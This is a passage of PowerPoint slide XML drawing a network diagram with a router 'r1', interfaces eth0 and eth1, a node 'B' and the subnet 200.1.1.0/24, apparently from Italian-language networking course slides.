                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1287FC5-FCB6-0982-C9AE-541EAF9C446C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>10</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73711160-E6AA-25D3-CFB5-B59E62C0D42E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4135015" y="5183863"/>
            <a:ext cx="220690" cy="220690"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>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it-IT" altLang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0556DE50-5D77-EEB7-AB4F-3176185FF608}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3008088" y="4654593"/>
            <a:ext cx="1146468" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="5F5F5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it-IT" altLang="it-IT" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>200.1.1.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{711EA6DB-3CBF-5B87-0433-BB7709083344}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3712201" y="4908509"/>
            <a:ext cx="442355" cy="397361"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="5F5F5F"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="61" name="Straight Connector 327">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14D9231D-F6F4-A5D7-B5A7-C8D1F4A59E88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5152303" y="2469897"/>
            <a:ext cx="49830" cy="283597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3" name="Group 227">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D190F71-C53A-081A-3E69-3B2AE8E3F03C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4911658" y="2892462"/>
            <a:ext cx="441381" cy="243680"/>
            <a:chOff x="2859" y="339"/>
            <a:chExt cx="384" cy="212"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9216" name="Group 228">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7047D95E-04D5-1C46-7DC4-63EB51DEC970}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2859" y="339"/>
              <a:ext cx="384" cy="212"/>
              <a:chOff x="5178" y="2567"/>
              <a:chExt cx="960" cy="528"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9218" name="AutoShape 229">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B79CEF9-3880-6C42-A687-5BF0A48F955C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5178" y="2567"/>
                <a:ext cx="960" cy="528"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill rotWithShape="0">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="002F5E"/>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:srgbClr val="0066CC"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="002F5E"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="0" scaled="1"/>
              </a:gradFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="819F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3025" tIns="36512" rIns="73025" bIns="36512"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it-IT" altLang="it-IT"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="9219" name="Group 231">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A71599CB-92D7-A3DA-CD6B-FEBE895C4894}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="5372" y="2597"/>
                <a:ext cx="595" cy="204"/>
                <a:chOff x="3028" y="2194"/>
                <a:chExt cx="823" cy="291"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9221" name="Freeform 232">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{235BF602-1B11-0779-BE8B-7267F86BEDC5}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3458" y="2201"/>
                  <a:ext cx="393" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 393"/>
                    <a:gd name="T1" fmla="*/ 97 h 125"/>
                    <a:gd name="T2" fmla="*/ 87 w 393"/>
                    <a:gd name="T3" fmla="*/ 125 h 125"/>
                    <a:gd name="T4" fmla="*/ 298 w 393"/>
                    <a:gd name="T5" fmla="*/ 42 h 125"/>
                    <a:gd name="T6" fmla="*/ 393 w 393"/>
                    <a:gd name="T7" fmla="*/ 70 h 125"/>
                    <a:gd name="T8" fmla="*/ 342 w 393"/>
                    <a:gd name="T9" fmla="*/ 0 h 125"/>
                    <a:gd name="T10" fmla="*/ 94 w 393"/>
                    <a:gd name="T11" fmla="*/ 0 h 125"/>
                    <a:gd name="T12" fmla="*/ 196 w 393"/>
                    <a:gd name="T13" fmla="*/ 21 h 125"/>
                    <a:gd name="T14" fmla="*/ 0 w 393"/>
                    <a:gd name="T15" fmla="*/ 97 h 12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93" h="125">
                      <a:moveTo>
                        <a:pt x="0" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="87" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="298" y="42"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="70"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="342" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="97"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:extLst>
                  <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                    <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:round/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a14:hiddenLine>
                  </a:ext>
                </a:extLst>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="it-IT"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9222" name="Freeform 234">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0690E39-D900-99F7-C2C3-071C5F4F0360}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3028" y="2348"/>
                  <a:ext cx="393" cy="132"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 393 w 393"/>
                    <a:gd name="T1" fmla="*/ 28 h 132"/>
                    <a:gd name="T2" fmla="*/ 305 w 393"/>
                    <a:gd name="T3" fmla="*/ 0 h 132"/>
                    <a:gd name="T4" fmla="*/ 102 w 393"/>
                    <a:gd name="T5" fmla="*/ 83 h 132"/>
                    <a:gd name="T6" fmla="*/ 0 w 393"/>
                    <a:gd name="T7" fmla="*/ 55 h 132"/>
                    <a:gd name="T8" fmla="*/ 51 w 393"/>
                    <a:gd name="T9" fmla="*/ 132 h 132"/>
                    <a:gd name="T10" fmla="*/ 305 w 393"/>
                    <a:gd name="T11" fmla="*/ 132 h 132"/>
                    <a:gd name="T12" fmla="*/ 196 w 393"/>
                    <a:gd name="T13" fmla="*/ 104 h 132"/>
                    <a:gd name="T14" fmla="*/ 393 w 393"/>
                    <a:gd name="T15" fmla="*/ 28 h 13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93" h="132">
                      <a:moveTo>
                        <a:pt x="393" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="305" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="102" y="83"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="55"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="305" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="28"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:extLst>
                  <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                    <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:round/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a14:hiddenLine>
                  </a:ext>
                </a:extLst>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="it-IT"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9236" name="Freeform 236">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A08864F-2E9C-67CD-BBE1-55FC588FB397}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3050" y="2194"/>
                  <a:ext cx="392" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 392"/>
                    <a:gd name="T1" fmla="*/ 28 h 125"/>
                    <a:gd name="T2" fmla="*/ 87 w 392"/>
                    <a:gd name="T3" fmla="*/ 0 h 125"/>
                    <a:gd name="T4" fmla="*/ 298 w 392"/>
                    <a:gd name="T5" fmla="*/ 77 h 125"/>
                    <a:gd name="T6" fmla="*/ 392 w 392"/>
                    <a:gd name="T7" fmla="*/ 56 h 125"/>
                    <a:gd name="T8" fmla="*/ 341 w 392"/>
                    <a:gd name="T9" fmla="*/ 125 h 125"/>
                    <a:gd name="T10" fmla="*/ 94 w 392"/>
                    <a:gd name="T11" fmla="*/ 125 h 125"/>
                    <a:gd name="T12" fmla="*/ 196 w 392"/>
                    <a:gd name="T13" fmla="*/ 104 h 125"/>
                    <a:gd name="T14" fmla="*/ 0 w 392"/>
                    <a:gd name="T15" fmla="*/ 28 h 12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92" h="125">
                      <a:moveTo>
                        <a:pt x="0" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="87" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="298" y="77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="392" y="56"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="341" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="28"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:extLst>
                  <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                    <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:round/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a14:hiddenLine>
                  </a:ext>
                </a:extLst>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="it-IT"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9238" name="Freeform 238">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FC2E3B2-C919-1992-88EB-BE8D9BE9D0D0}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3442" y="2361"/>
                  <a:ext cx="393" cy="124"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 393 w 393"/>
                    <a:gd name="T1" fmla="*/ 97 h 124"/>
                    <a:gd name="T2" fmla="*/ 306 w 393"/>
                    <a:gd name="T3" fmla="*/ 124 h 124"/>
                    <a:gd name="T4" fmla="*/ 102 w 393"/>
                    <a:gd name="T5" fmla="*/ 41 h 124"/>
                    <a:gd name="T6" fmla="*/ 0 w 393"/>
                    <a:gd name="T7" fmla="*/ 69 h 124"/>
                    <a:gd name="T8" fmla="*/ 51 w 393"/>
                    <a:gd name="T9" fmla="*/ 0 h 124"/>
                    <a:gd name="T10" fmla="*/ 306 w 393"/>
                    <a:gd name="T11" fmla="*/ 0 h 124"/>
                    <a:gd name="T12" fmla="*/ 197 w 393"/>
                    <a:gd name="T13" fmla="*/ 21 h 124"/>
                    <a:gd name="T14" fmla="*/ 393 w 393"/>
                    <a:gd name="T15" fmla="*/ 97 h 12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93" h="124">
                      <a:moveTo>
                        <a:pt x="393" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="306" y="124"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="102" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="306" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="197" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="97"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:extLst>
                  <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                    <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:round/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a14:hiddenLine>
                  </a:ext>
                </a:extLst>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="it-IT"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9217" name="WordArt 249">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B21C11E9-E79B-591F-C55B-D12D65941A79}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2885" y="428"/>
              <a:ext cx="346" cy="103"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textCanDown">
                <a:avLst>
                  <a:gd name="adj" fmla="val 33333"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="it-IT" sz="1400" kern="10" dirty="0">
                  <a:ln w="9525">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>r1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9251" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45F7ECF4-BBD1-81E9-1575-5C65E627733D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5002404" y="2547001"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9252" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A382590-684E-624B-C2FD-ED989287E51D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9253" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6882B6F1-22B7-65F5-0428-709B8C1F437D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9254" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B68F19A7-E933-8206-417D-E1B9EFC95BB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4989256" y="3258486"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9255" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D044E468-E2EA-922A-D0CC-BC93D34ABB02}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9256" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F3EE73C-F240-FF8F-8287-378AD6A84E29}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9257" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
